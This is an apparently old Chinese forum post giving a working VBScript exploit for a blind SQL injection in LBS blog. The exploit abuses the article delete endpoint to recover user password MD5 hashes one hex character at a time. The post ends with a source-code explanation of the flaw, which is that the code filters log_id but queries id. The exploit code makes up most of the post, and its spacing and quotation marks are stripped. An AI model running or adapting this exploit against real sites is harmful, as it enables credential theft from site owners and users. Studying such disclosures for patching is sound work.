LBS blog sql注射漏洞[All version]-官方已有补丁

呵呵,只是证明下漏洞存在
exp如下,保存为vbs,自己下个程序测试自己吧

From剑心
============================================================================
使用说明：
在命令提示符下：
cscript.exelbsblog.vbs要攻击的网站的博客路径有效的文章id要破解的博客用户密码
如：
cscript.exelbsblog.vbs
byloveshell
============================================================================
OnErrorResumeNext
DimoArgs
DimolbsXMLXMLHTTP对象用来打开目标网址
DimTargetURL目标网址
Dimuserid,articleid博客用户名
DimTempStr存放已获取的部分MD5密码
DimCharHex定义16进制字符
Dimcharset

SetoArgs=WScript.arguments


SetolbsXML=createObject(Microsoft.XMLHTTP)

补充完整目标网址
TargetURL=oArgs(0)
IfLCase(Left(TargetURL,7))<>
Ifright(TargetURL,1)<>/ThenTargetURL=TargetURL&/
TargetURL=TargetURL&article.asp

articleid=oArgs(1)
userid=oArgs(2)
TempStr=
CharHex=Split(0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f,,)


WScript.echoLBSblogAllversionExploit&vbcrlf
WScript.echoBy剑心&vbcrlf
WScript.echo
WScript.echo+Fuckthesitenow&vbcrlf

Callmain(TargetURL,BlogName)

SetoBokeXML=Nothing


----------------------------------------------sub-------------------------------------------------------
============================================
函数名称：main
函数功能：主程序，注入获得blog用户密码
============================================
Submain(TargetURL,BlogName)
DimMainOffset,SubOffset,TempLen,OpenURL,GetPage
ForMainOffset=1To40
ForSubOffset=0To15
TempLen=0
postdata=
postdata=articleid&and(selectleft(user_password,&MainOffset&)fromblog_userwhereuser_id=&userid&)=&TempStr&CharHex(SubOffset)&

OpenURL=TargetURL

olbsXML.openPost,OpenURL,False,,
olbsXML.setRequestHeaderContent-Type,application/x-
olbsXML.sendact=delete&id=&escape(postdata)
GetPage=BytesToBstr(olbsXML.ResponseBody)
判断访问的页面是否存在
IfInStr(GetPage,deleted)<>0Then
博客用户不存在或填写的资料有误为错误标志，返回此标志说明猜解的MD5不正确
如果得到0000000000000000的MD5值，请修改错误标志
ElseIfInStr(GetPage,permission)<>0Then
TempStr=TempStr&CharHex(SubOffset)
WScript.Echo+Cracknow：&TempStr
Exitfor
Else
WScript.echovbcrlf&Somethingerror&vbcrlf
WScript.echovbcrlf&GetPage&vbcrlf
WScript.Quit
EndIf
next
Next
WScript.Echovbcrlf&+WeGotIt：&TempStr&vbcrlf&vbcrlf&:PDontBeevil
Endsub

============================================
函数名称：BytesToBstr
函数功能：将XMLHTTP对象中的内容转化为GB2312编码
============================================
FunctionBytesToBstr(body)
dimobjstream
setobjstream=createObject(ADODB.Stream)
objstream.Type=1
objstream.Mode=3
objstream.Open
objstream.Writebody
objstream.Position=0
objstream.Type=2
objstream.Charset=GB2312
BytesToBstr=objstream.ReadText
objstream.Close
setobjstream=nothing
EndFunction

============================
函数名称：ShowUsage
函数功能：使用方法提示
============================
SubShowUsage()
WScript.echoLBSblogExploit&vbcrlf&ByLoveshell/剑心
WScript.echoUsage:&vbcrlf&CScript&WScript.ScriptFullName&TargetURLBlogName
WScript.echoExample:&vbcrlf&CScript&WScript.ScriptFullName&
WScript.echo
WScript.Quit
EndSub



漏洞说明:

src_article.asp中的
......
input[log_id]=func.checkInt(input[log_id]);
if(!input[id]){
strError=lang[invalid_parameter];
}else{
//Checkifthearticleexists
theArticle.load(log_id,log_authorID,log_catID,log_id=+input[id]);
strError=false;
}
......


过滤的是log_id,但是使用的确实id,呵呵:)

然后呢?
class/article.asp中的代码
this.load=function(strselect,strwhere){
vartmpA=connBlog.query(selectTOP1+strselect+FROM[blog_Article]where+strwhere);
if(tmpA){
this.fill(tmpA[0]);
returntrue;
}else{
returnfalse;
}
}


上面不用说了吧,呵呵.不过触发要条件的,看能满足不哦!

functionarticledelete(){
if(theUser.rights[delete]<1){
//CheckUserRight-withoutDBQuery
pageHeader(lang[error]);
redirectMessage(lang[error],lang[no_rights],lang[goback],javascript:window.history.back();,false,errorbox);
}else{
vartheArticle=newlbsArticle();
varstrError;



默认情况下guest都有删除权限的,尽管后面还做了判断,但是注入已经发生,而我们正好利用他的判断注射,呵呵